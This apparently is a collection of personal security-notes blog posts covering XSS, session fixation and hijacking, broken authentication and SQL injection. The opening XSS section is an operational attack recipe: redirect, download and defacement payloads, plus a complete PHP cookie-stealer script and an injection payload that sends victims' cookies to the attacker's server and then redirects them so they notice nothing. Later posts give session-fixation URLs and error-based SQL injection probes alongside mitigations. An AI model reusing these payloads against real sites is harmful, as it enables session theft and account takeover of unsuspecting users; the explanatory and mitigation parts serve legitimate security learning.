<br />
<b>Exploit 1 :</b><br />
An attacker can redirect the victim to a malicious website<br />
payload :<br />
<script>alert("click ok to redirect");window.location.href="https://www.google.com"</script><br />
<br />
An attacker can make the victim download a malicious file<br />
payload<br />
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script><br />
<br />
<b>Exploit 2 :</b><br />
An attacker can steal the victim's cookies<br />
How to do it :<br />
Stealing cookies is a 3-step process;<br />
the attacker needs<br />
1) an injected script<br />
2) a cookie stealer<br />
3) a log file<br />
<br />
Create an account on a server and create two files, log.txt and cookiestealer.php. You can leave log.txt empty; this is the file your cookie stealer will write to. Now paste the following PHP code into your cookie stealer script (cookiestealer.php):<br />
<br />
cookiestealer code :<br />
<br />
<?php<br />
<br />
function GetIP()<br />
{<br />
<span style="white-space: pre;"> </span>if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))<br />
<span style="white-space: pre;"> </span>$ip = getenv("HTTP_CLIENT_IP");<br />
<span style="white-space: pre;"> </span>else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))<br />
<span style="white-space: pre;"> </span>$ip = getenv("HTTP_X_FORWARDED_FOR");<br />
<span style="white-space: pre;"> </span>else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))<br />
<span style="white-space: pre;"> </span>$ip = getenv("REMOTE_ADDR");<br />
<span style="white-space: pre;"> </span>else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))<br />
<span style="white-space: pre;"> </span>$ip = $_SERVER['REMOTE_ADDR'];<br />
<span style="white-space: pre;"> </span>else<br />
<span style="white-space: pre;"> </span>$ip = "unknown";<br />
<span style="white-space: pre;"> </span>return($ip);<br />
}<br />
<br />
function logData()<br />
{<br />
<span style="white-space: pre;"> </span>$ipLog="log.txt";<br />
<span style="white-space: pre;"> </span>$cookie = $_SERVER['QUERY_STRING'];<br />
<span style="white-space: pre;"> </span>$register_globals = (bool) ini_get('register_gobals');<br />
<span style="white-space: pre;"> </span>if ($register_globals) $ip = getenv('REMOTE_ADDR');<br />
<span style="white-space: pre;"> </span>else $ip = GetIP();<br />
<br />
<span style="white-space: pre;"> </span>$rem_port = $_SERVER['REMOTE_PORT'];<br />
<span style="white-space: pre;"> </span>$user_agent = $_SERVER['HTTP_USER_AGENT'];<br />
<span style="white-space: pre;"> </span>$rqst_method = $_SERVER['METHOD'];<br />
<span style="white-space: pre;"> </span>$rem_host = $_SERVER['REMOTE_HOST'];<br />
<span style="white-space: pre;"> </span>$referer = $_SERVER['HTTP_REFERER'];<br />
<span style="white-space: pre;"> </span>$date=date ("l dS of F Y h:i:s A");<br />
<span style="white-space: pre;"> </span>$log=fopen("$ipLog", "a+");<br />
<br />
<span style="white-space: pre;"> </span>if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))<br />
<span style="white-space: pre;"> </span>fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");<br />
<span style="white-space: pre;"> </span>else<br />
<span style="white-space: pre;"> </span>fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");<br />
<span style="white-space: pre;"> </span>fclose($log);<br />
}<br />
<br />
logData();<br />
<br />
?><br />
<br />
This script will record the cookies of every user that views it.<br />
<br />
Now find an XSS-vulnerable page, parameter or search box and put in the payload<br />
"><script language= "JavaScript">document.location="http://yoursite.com/cookiestealer.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script><br />
<br />
yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened.<br />
<br />
<b>Exploit 3 : </b><br />
An attacker can deface a page with their own page, picture or photo<br />
Payload<br />
<img src=link of the image><br />
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script><br />
<br />
<b>Exploit 4 :</b><br />
BeEF = Browser Exploitation Framework<br />
<br />
http://www.hacking-tutorial.com/hacking-tutorial/xss-attack-hacking-using-beef-xss-framework/#sthash.kypFITWL.dpbs<br />
<br />
<br />
<br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-76052440910406894182018-06-18T07:40:00.001-07:002018-06-18T07:58:39.683-07:00Session_ALL about Session <div dir="ltr" style="text-align: left;" trbidi="on">
Session ID is not updated after login<br />
<span style="white-space: pre;"> </span>This attack is done locally: for example => in an organization someone logs out but the session is not expired, so he/she may log into it again by reusing that session<br />
<span style="white-space: pre;"> </span><br />
Attack Scenario: setting the Session ID with the help of XSS<br />
<br />
*************************<br />
All about <a href="http://prasoon-nigam.blogspot.com/2018/06/broken-authentication-and-session.html" target="_blank">broken-authentication-and-session</a><br />
<a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection and Defense</a><br />
*************************************************<br />
<br />
Session Fixation<br />
======================<br />
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack exploits a limitation in the way the web application manages the session ID: more specifically, when authenticating a user, the vulnerable web application doesn't assign a new session ID, making it possible to use an existing session ID. The attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by knowledge of the user's session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it.<br />
<br />
The session fixation attack is a class of Session Hijacking. Ordinary session hijacking steals the established session between the client and the Web Server after the user logs in; the Session Fixation attack instead fixes an established session on the victim's browser, so the attack starts before the user logs in.<br />
<br />
There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common techniques:<br />
<br />
• Session token in the URL argument: The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.<br />
<br />
• Session token in a hidden form field: In this method, the victim must be tricked into authenticating to the target Web Server using a login form developed by the attacker. The form could be hosted on the attacker's web server or directly in an HTML-formatted e-mail.<br />
<br />
• Session ID in a cookie:<br />
<br />
o Client-side script<br />
<br />
Most browsers support the execution of client-side scripting. In this case, the attacker could use a code injection attack such as XSS (Cross-site scripting) to insert malicious code into the hyperlink sent to the victim and fix a Session ID in its cookie. Using document.cookie, the browser which executes the command becomes capable of fixing values inside the cookie that it will use to keep a session between the client and the Web Application.<br />
<br />
o <META> tag<br />
<br />
<META> tag injection is also considered a code injection attack; however, it differs from the XSS attack, where undesirable scripts can be disabled or their execution denied. An attack using this method becomes much more effective because it's impossible to disable the processing of these tags in browsers.<br />
<br />
o HTTP header response<br />
<br />
This method exploits the server response to fix the Session ID in the victim's browser. By including the Set-Cookie parameter in the HTTP response header, the attacker is able to insert the Session ID value into the cookie and send it to the victim's browser.<br />
<br />
*************************<br />
Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
All about <a href="http://prasoon-nigam.blogspot.com/2018/06/broken-authentication-and-session.html" target="_blank">broken-authentication-and-session</a><br />
<a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL Injection and Defense</a><br />
*************************************************<br />
<br />
<br />
Session hijacking<br />
======================<br />
The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed by a session token.<br />
<br />
Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user's connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways: in the URL, in the header of the HTTP request as a cookie, in other parts of the header of the HTTP request, or in the body of the HTTP request.<br />
<br />
The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.<br />
<br />
The session token could be compromised in different ways; the most common are:<br />
<br />
Predictable session token;<br />
Session Sniffing;<br />
Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);<br />
Man-in-the-middle attack<br />
Man-in-the-browser attack</div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-22725456961144818282018-06-18T07:20:00.000-07:002018-06-18T07:58:53.533-07:00Broken Authentication and Session Management<div dir="ltr" style="text-align: left;" trbidi="on">
Broken Authentication and Session Management<br />
===============================================<br />
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.<br />
<span style="white-space: pre;"> </span><br />
Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, time-outs, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.<br />
<br />
Session IDs<br />
=================<br />
A session ID is a unique identifier....<br />
As we know, HTTP is a stateless protocol, which means that it provides no integrated way for a web server to maintain state across a user's subsequent requests.<br />
A session identifier, session ID or session token is a piece of data that is used in network communications (often over HTTP) to identify a session, a series of related message exchanges. Session identifiers become necessary in cases where the communications infrastructure uses a stateless protocol such as HTTP.<br />
For example, a buyer who visits a seller's site wants to collect a number of articles in a virtual shopping cart and then finalize the shopping by going to the site's checkout page. This typically involves an ongoing communication where several web pages are requested by the client and sent back to them by the server. In such a situation, it is vital to keep track of the current state of the shopper's cart, and a session ID is one way to achieve that goal.<br />
<br />
A session ID is typically granted to a visitor on his first visit to a site. It is different from a user ID in that sessions are typically short-lived (they expire after a preset time of inactivity which may be minutes or hours) and may become invalid after a certain goal has been met (for example, once the buyer has finalized his order, he cannot use the same session ID to add more items).<br />
<br />
Three widely used methods for maintaining sessions on the Web<br />
=======================================================<br />
1) URL arguments<br />
2) Hidden form fields<br />
3) Cookies (cookies have proven to be the most convenient)<br />
<br />
************************************<br />
Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
Basics for SQL Injection and Remediations => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">Click on me :)</a><br />
Nmap with Metasploits => <a href="http://prasoon-nigam.blogspot.com/2015/05/nmap-in-metasploit.html" target="_blank">Click one me :)</a><br />
*************************************************************<br />
<br />
<br />
Session Management<br />
=====================<br />
Session management is the process of keeping track of a user's activity across sessions of interaction with the computer system.<br />
Types<br />
======<br />
Desktop session management => A desktop session manager is a program that can save and restore desktop sessions. A desktop session is all the windows currently running and their current content.<br />
<br />
Browser session management => Session management is particularly useful in a web browser where a user can save all open pages and settings and restore them at a later date. To help recover from a system or application crash, pages and settings can also be restored on next run.<br />
<br />
Web Server Session management => Hypertext Transfer Protocol (HTTP) is stateless: a client computer running a web browser must establish a new Transmission Control Protocol (TCP) network connection to the web server with each new HTTP GET or POST request. The web server, therefore, cannot rely on an established TCP network connection for longer than a single HTTP GET or POST operation. Session management is the technique used by the web developer to make the stateless HTTP protocol support session state. For example, once a user has been authenticated to the web server, the user's next HTTP request (GET or POST) should not cause the web server to ask for the user's account and password again. For a discussion of the methods used to accomplish this see HTTP cookie and Session ID<br />
<br />
Session management over SMS =><br />
<br />
Vulnerabilities<br />
===========================<br />
> User authentication credentials aren’t protected when stored using hashing or encryption.<br />
> Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).<br />
> Session IDs are exposed in the URL (e.g., URL rewriting).<br />
> Session IDs are vulnerable to session fixation attacks.<br />
> Session IDs don’t time-out, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.<br />
> Session IDs aren’t rotated after successful login.<br />
> Passwords, session IDs, and other credentials are sent over unencrypted connections.<br />
<br />
<br />
Attacks Done on Session IDs<br />
=====================================<br />
1) Session Hijacking => The attacker gains access to the user's session by obtaining his session ID<br />
2) Session fixation => The attacker fixes the user’s session ID before the user even logs into the target server, thereby eliminating the need to obtain the user’s session ID afterwards.<br />
<span style="white-space: pre;"> </span>Attacks made in session fixation =><span style="white-space: pre;"> </span><br />
<span style="white-space: pre;"> </span>*) Interception<span style="white-space: pre;"> </span>(Encrypted communication effectively protects against interception)<br />
<span style="white-space: pre;"> </span>*) Prediction<span style="white-space: pre;"> </span>(Cryptographically strong pseudo-random number generators and carefully chosen seeds that don't leak from the server prevent prediction of session IDs)<br />
<span style="white-space: pre;"> </span>*) Brute-force <span style="white-space: pre;"> </span>(Bit-length must be large enough with respect to the number of simultaneous sessions)<br />
<br />
Session fixation vs. session hijacking<br />
==========================================<br />
Timing<br />
Session fixation : Attacker attacks the user’s browser before he logs in to the target server.<br />
Session hijacking : Attacker attacks the user’s browser after he logs in to the target server.<br />
<br />
Impact Duration<br />
Session fixation : Attacker gains one-time, temporary or long-term access to the user’s session(s).<br />
Session hijacking : Attacker usually gains one-time access to the user’s session and has to repeat the attack in order to gain access to another one.<br />
<br />
Session Maintenance<br />
Session fixation : Can require the attacker to maintain the trap session until the user logs into it.<br />
Session hijacking : Requires no session maintenance.<br />
<br />
Attack Vectors<br />
Session fixation<br />
<span style="white-space: pre;"> </span>1. Tricking the user to log in through a malicious hyperlink or a malicious login form<br />
<span style="white-space: pre;"> </span>2. Exploiting a cross-site scripting vulnerability on any web server in the target server's domain<br />
<span style="white-space: pre;"> </span>3. Exploiting a meta tag injection vulnerability on any web server in the target server’s domain<br />
<span style="white-space: pre;"> </span>4. Exploiting the “session adoption” feature of some web servers<br />
<span style="white-space: pre;"> </span>5. Breaking into any host in the target server’s domain<br />
<span style="white-space: pre;"> </span>6. Adding a domain cookie-issuing server to the target server’s domain in the user’s DNS server<br />
<span style="white-space: pre;"> </span>7. Network traffic modification<br />
<br />
Session hijacking<br />
<span style="white-space: pre;"> </span>1. Exploiting a cross-site scripting vulnerability on the target server<br />
<span style="white-space: pre;"> </span>2. Obtaining the session ID in the HTTP Referer header sent to another web server<br />
<span style="white-space: pre;"> </span>3. Network traffic sniffing (only works with an unencrypted link to the target server)<br />
<br />
Attack Target Area<br />
<span style="white-space: pre;"> </span>Session fixation : Communication link, target web server, all hosts in target server’s domain, user’s DNS server<br />
<span style="white-space: pre;"> </span>Session hijacking : Communication link, target web server<br />
<span style="white-space: pre;"> </span><br />
<br />
Mitigation<br />
===============<br />
1) HttpOnly flag on the session cookie<br />
2) Secure flag if HTTPS is used<br />
3) Encrypted communication between the user's browser and the target web server<br />
4) Ensuring that sessions expire within a reasonable period of time<br />
<br />
Broken Authentication and Session Management Cases<br />
=====================================================<br />
Case 1:<span style="white-space: pre;"> </span><br />
Plain-text storage of passwords<br />
Storing a password in plaintext may result in a system compromise<br />
An attacker can sniff the network with the help of any sniffing tool (such as Wireshark)<br />
<br />
Case 2:<span style="white-space: pre;"> </span><br />
Improper Authentication<span style="white-space: pre;"> </span><br />
When the user claims to have a given identity, the software does not prove, or insufficiently proves, that the claim is correct.<br />
<br />
Case 3:<br />
Missing Encryption of Sensitive Data<br />
The software/website does not encrypt sensitive or critical information before storage or transmission<br />
The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys.<br />
For example: storage of credit card numbers or PINs, user info or passwords<br />
<br />
Case 4:<span style="white-space: pre;"> </span><br />
Clear text Transmission of Sensitive Information<span style="white-space: pre;"> </span><br />
The software transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by an attacker.<br />
Many communication channels can be "sniffed" by attackers during data transmission. For example, network traffic can often be sniffed by an attacker who has access to a network interface. This significantly lowers the difficulty of exploitation by attackers.<br />
<br />
Case 5:<br />
Session Fixation<span style="white-space: pre;"> </span><br />
Read above for session fixation<br />
<br />
Case 6:<br />
Insufficiently Protected Credentials<br />
Login pages not using adequate measures to protect the username and password while they are in transit from the client to the server<br />
Use SSL<br />
<span style="white-space: pre;"> </span><br />
Case 7:<br />
Insufficient Session Expiration<span style="white-space: pre;"> </span><br />
"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization."<br />
The lack of proper session expiration may improve the likely success of certain attacks. For example, an attacker may intercept a session ID, possibly via a network sniffer or Cross-site Scripting attack. Although short session expiration times do not help if a stolen token is immediately used, they will protect against ongoing replaying of the session ID. In another scenario, a user might access a website from a shared computer (such as at a library, Internet cafe, or open work environment). Insufficient Session Expiration could allow an attacker to use the browser's back button to access web pages previously accessed by the victim.<br />
> Set sessions/credentials expiration date<br />
<br />
Case 8:<br />
Unverified Password Change<br />
When setting a new password for a user, the product does not require knowledge of the original password or using another form of authentication.<br />
This could be used by an attacker to change passwords for another user, thus gaining the privileges associated with that user. (may lead to CSRF)<br />
<br />
Case 9:<br />
Weak Password Recovery Mechanism for Forgotten Password<span style="white-space: pre;"> </span><br />
The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.<br />
It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user's account.(May lead to Brute force attack)<br />
This weakness may be that the security question is too easy to guess or find an answer to (e.g. because it is too common). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system's weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system. Weak password recovery schemes completely undermine a strong password<br />
<br />
<br />
Exploitation With SessionId<br />
================================<br />
IMP : https://www.exploit-db.com/papers/15990/<br />
=============<br />
<br />
Exploit 1 : Session Fixation<br />
On a bank website, session IDs are transported from browser to server in a URL argument sessionid.<br />
<br />
The attacker – who in this case is also a legitimate user of the system – logs into the server and is issued a session ID 1234. The attacker then sends a hyperlink<br />
http://online.worldbank.dom/login.jsp?sessionid=1234 to the victim, trying to lure him into clicking on it. The victim clicks on the link, which opens the server’s login page in his browser.<br />
Note that upon request for login.jsp?sessionid=1234, the web application has established that a session already exists for this user and a new one need not be created. Finally, the user provides his credentials to the login script and the server grants him access to his bank account. However, at this point, knowing the session ID, the attacker can also access the victim's account via account.jsp?sessionid=1234. Since the session has already been fixed before the user logged in, we say that the user logged into the attacker’s session.<span style="white-space: pre;"> </span><br />
<br />
The attacker uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234";</script>.idc to fix the session ID in the victim's browser<br />
<br />
For domain cookie fixation<br />
The attacker uses http://online.worldbank.dom/<script>document.cookie="sessionid=1234;domain=.worldbank.dom";</script>.idc<br />
<br />
Meta tag injection<br />
====================<br />
Issuing a cookie using the <META> tag with the Set-Cookie attribute<br />
<meta http-equiv=Set-Cookie content="sessionid=1234"><br />
<br />
http://online.worldbank.dom/<meta%20http-equiv=Set-Cookie%20content="sessionid=1234;%20Expires=Friday,%201-Jan-2010%2000:00:00%20GMT">.idc<br />
<br />
Exploit 2 : Network-based attack (man-in-the-middle attack)<br />
Sniffing the packets within the network going to and from the victim's computer<br />
<br />
The attacker can inject a small (invisible) image in any web server’s response to the browser – for example when the user is reading Yahoo news. This image would originate from any web server in the .website.com domain. Upon requesting the image content, the browser would connect to this web server and the attacker, intercepting the request, could send a fake response by the web server, including a Set-Cookie header, thereby fixing the user’s session.<br />
<br />
Exploit 3 : Prediction<br />
The attacker can predict the session ID if session IDs are not unique or are not randomly generated<br />
For example :<br />
The session ID is 123456<br />
session ID 2 is 123456789<br />
session ID 3 is then predictable: maybe 123456789101112<br />
<br /></div>
Pprasoonhttp://www.blogger.com/profile/03035156066634387335noreply@blogger.com0tag:blogger.com,1999:blog-5075788214695190708.post-4140086934254704822018-06-05T06:02:00.003-07:002018-06-05T07:59:42.144-07:00SQL injection Contd......<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
SQL injection must be tested in headers, cookies and parameters with a single quote ('). SQL injection is more important than XSS and is always found where SQL queries run: select, create, update and delete. We search for error-based entries; everything dealing with the database must be fuzzed for SQL injection and with the Burp scanner. CRUD operations must not be missed out, and detection matters most, to find new areas for detection. JSON requests that carry a key parameter must not be ignored, as they are attached to the database and can be exploited.<br />
<br />
************************<br />
Read the => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL injection attack and defense notes</a><br />
*****************************************<br />
<span style="color: red;"><br /></span> <span style="color: red;">SQLmap </span><br />
If it is not exploitable then reduce the likelihood rating, but never the impact; the impact always stays the same<br />
<br />
<span style="color: red;"><b>Remediation </b></span><br />
Suggest generic remediation as well as technology-specific remediation for .NET, PHP and J2EE<br />
<br />
<b>The OWASP guide is best; </b>Google search for it<br />
<b><span style="color: red;"> dynamic query </span></b><br />
<span style="white-space: pre;"> </span>Dynamic SQL is a programming technique that enables you to build SQL statements dynamically at runtime. You can create more general purpose, flexible applications by using dynamic SQL because the full text of a SQL statement may be unknown at compilation. For example, dynamic SQL lets you create a procedure that operates on a table whose name is not known until runtime.<br />
<br /><span style="color: red;">Stored procedure functions</span><b><span style="color: red;"> persistent query </span></b><br />
<b><span style="color: red;"> prepared statement </span></b><br />
<span style="color: red;">parameterized query (pre-compiled statement)</span> - important<br />
A parameterized query (also known as a prepared statement) is a means of pre-compiling a SQL statement so that all you need to supply are the "parameters" (think "variables") that need to be inserted into the statement for it to be executed. It is commonly used as a means of preventing SQL injection attacks; the API for it differs between PHP, .NET and JSP.<br />
<br /><br /><br />
************************<br />
Read the => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-attack-and-defense-notes.html" target="_blank">SQL injection attack and defense notes</a><br />
*****************************************</div>
SQL injection attack and defense notes (Pprasoon, 2018-06-05)<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUx3pNwm-OXVwUvGyo-uoodH11TujfQAt4pnlG83WRTnrvn-1RaFOGzLVntDI5nvHi8UAQTeg3hHdRrgIKNdkI0KGFD35_WPZRlATbBk1jHoQrgU8x3nfH6VWR-2vZ2s7HlCGWLp8BNg8/s1600/download.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="163" data-original-width="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUx3pNwm-OXVwUvGyo-uoodH11TujfQAt4pnlG83WRTnrvn-1RaFOGzLVntDI5nvHi8UAQTeg3hHdRrgIKNdkI0KGFD35_WPZRlATbBk1jHoQrgU8x3nfH6VWR-2vZ2s7HlCGWLp8BNg8/s1600/download.jpg" /></a></div>
<br />
<br />
SQL injection vulnerabilities most commonly occur when the Web application developer does not ensure that values received from a Web form, cookie, input parameter, and so forth are validated or encoded before passing them to SQL queries that will be executed on a database server.<br />
<br />
If an attacker can control the input that is sent to an SQL query and manipulate that input so that the data is interpreted as code instead of as data, he may be able to execute code on the back-end database.<br />
<br />
Without a sound understanding of the underlying database that they are interacting with, or a thorough understanding and awareness of the potential security issues of the code that is being developed, application developers can often produce inherently insecure applications that are vulnerable to SQL injection.<br />
<br />
Q: What is the impact of an SQL injection vulnerability?<br />
A: This depends on many variables; however, potentially an attacker can manipulate data in the database, extract much more data than the application should allow, and possibly execute operating system commands on the database server<br />
<br />
Q: Is SQL injection a new vulnerability?<br />
A: No. SQL injection has probably existed since SQL databases were first connected to Web applications. However, it was brought to the attention of the public on Christmas Day 1998.<br />
<br />
Q: Can Web sites be immune to SQL injection if they do not allow the quote character to be entered?<br />
A: No. There is a myriad of ways to encode the quote character so that it is accepted as input, and some SQL injection vulnerabilities can be exploited without using it at all. Also, the quote character is not the only character that can be used to exploit SQL injection vulnerabilities; a number of characters are available to an attacker, such as the double pipe (||) and double quote (“), among others.<br />
<br />
Q: My application is written in PHP/ASP/Perl/.NET/Java, etc. Is my chosen language immune?<br />
A: No. Any programming language that does not validate input before passing it to a dynamically created SQL statement is potentially vulnerable; that is, unless it uses parameterized queries and bind variables.<br />
<br />
**********************<br />
Learn more on => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-contd.html" target="_blank">SQL injection Contd......</a><br />
Cross Site Scripting => <a href="http://prasoon-nigam.blogspot.com/2018/06/cross-site-scripting-xss-definition.html" target="_blank">Click on me :)</a><br />
************************************************<br />
<br />
Finding SQL Injection<br />
=========================<br />
The Web browser is a client acting as a front-end requesting data from the user and sending it to the remote server which will create SQL queries using the submitted data. Our main goal at this stage is to identify anomalies in the server response and determine whether they are generated by an SQL injection vulnerability.<br />
<br />
<br />
Testing by Inference<br />
There is one simple rule for identifying SQL injection vulnerabilities: Trigger anomalies by<br />
sending unexpected data. This rule implies that:<br />
■■ You identify all the data entry on the Web application.<br />
■■ You know what kind of request might trigger anomalies.<br />
■■ You detect anomalies in the response from the server.<br />
<br />
The two most common methods are GET and POST.<br />
GET sends everything in the URL, for example:<br />
GET /search.aspx?text=lcd%20monitors&cat=1&num=20 HTTP/1.1<br />
This kind of request sends parameters within the URL in the following format:<br />
?parameter1=value1&parameter2=value2&parameter3=value3...<br />
<br />
POST: the POST method is basically used when you fill in a form; the values are sent at the bottom of the request (the body):<br />
<br />
POST /contact/index.asp HTTP/1.1<br />
<br />
Content-Length: 129<br />
first=John&last=Doe&email=john@doe.com&phone=555123456&title=Mr&country=US&comments=<br />
I%20would%20like%20to%20request%20information<br />
<br />
<b><span style="color: red;">Manipulating Parameter</span></b><br />
For example, you have these URLs:<br />
http://www.victim.com/showproducts.php?category=bikes<br />
http://www.victim.com/showproducts.php?category=cars<br />
http://www.victim.com/showproducts.php?category=boats<br />
<br />
The showproducts.php page receives a parameter called category. You don't have to type anything; you just click the link and are redirected.<br />
<br />
But if you change it to http://www.victim.com/showproducts.php?category=attacker<br />
<br />
you get an SQL error.<br />
In the preceding example, we sent a request to the server with a non-existent category name. The response from the server was as follows:<br />
Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/victim.com/showproducts.php on line 34<br />
<br />
**********************<br />
Learn more on => <a href="http://prasoon-nigam.blogspot.com/2018/06/sql-injection-contd.html" target="_blank">SQL injection Contd......</a><br />
************************************************<br />
<br />
Another interesting test you can conduct to identify vulnerabilities in Microsoft SQL Server and Oracle is to send the following two requests to the Web server:<br />
http://www.victim.com/showproducts.php?category=bikes<br />
http://www.victim.com/showproducts.php?category=bi'+'kes<br />
The MySQL equivalent is:<br />
http://www.victim.com/showproducts.php?category=bikes<br />
http://www.victim.com/showproducts.php?category=bi' 'kes<br />
<br />
If the result of both requests is the same, there is a high possibility that there is an SQL injection vulnerability.<br />
<br />
<span style="color: red;">SQL injection vulnerabilities occur for two reasons:</span><br />
■■ Lack of user input sanitization<br />
■■ Data and control structures mixed in the same transport channel<br />
<br />
When an SQL error occurs, the application may handle it in one of the following ways:<br />
■■ The SQL error is displayed on the page and is visible to the user from the Web browser.<br />
■■ The SQL error is hidden in the source of the Web page for debugging purposes.<br />
■■ Redirection to another page is used when an error is detected.<br />
■■ An HTTP error code 500 (Internal Server Error) or HTTP redirection code 302 is returned.<br />
■■ The application handles the error properly and simply shows no results, perhaps displaying a generic error page.<br />
<br />
<br />
<b><span style="color: red;">Commonly Displayed SQL Errors</span></b><br />
===============================<br />
<br />
Microsoft SQL Server Errors<br />
<br />
Consider the following request:<br />
http://www.victim.com/showproducts.aspx?category=attacker'<br />
The error returned from the remote application will be similar to the following:<br />
Server Error in '/' Application.<br />
Unclosed quotation mark before the character string 'attacker;'.<br />
<br />
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.<br />
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attacker;'.<br />
<br />
Imagine you find a page called showproduct.aspx in the victim.com application.<br />
The script receives a parameter called id and displays a single product depending on the value<br />
of the id parameter:<br />
http://www.victim.com/showproduct.aspx?id=2<br />
When you change the value of the id parameter to something such as the following:<br />
http://www.victim.com/showproduct.aspx?id=attacker<br />
the application returns an error similar to this:<br />
Server Error in '/' Application.<br />
Invalid column name 'attacker'.<br />
Description: An unhandled exception occurred during the execution of the<br />
current web request. Please review the stack trace for more information<br />
about the error and where it originated in the code.<br />
Exception Details: System.Data.SqlClient.SqlException: Invalid column name<br />
'attacker'.<br />
<br />
<br />
Based on the error, you can assume that in the first instance the application creates an<br />
SQL statement such as this:<br />
SELECT * FROM products WHERE idproduct=2<br />
The preceding statement returns a result set with the product whose id product field equals 2. However, when you inject a non-numeric value, such as attacker, the resultant SQL statement sent to the database server has the following syntax:<br />
SELECT * FROM products WHERE idproduct=attacker<br />
The SQL server understands that if the value is not a number it must be a column name.<br />
In this case, the server looks for a column called attacker within the products table. However,<br />
there is no column named attacker, and therefore it returns an error.<br />
There are some techniques that you can use to retrieve information embedded in the<br />
errors returned from the database. The first one generates an error converting a string to an<br />
integer:<br />
http://www.victim.com/showproducts.aspx?category=bikes' and 1=0/@@version;--<br />
Application response:<br />
Server Error in '/' Application.<br />
Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 – 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft<br />
Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: ) ' to a column of data type int.<br />
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information<br />
about the error and where it originated in the code.<br />
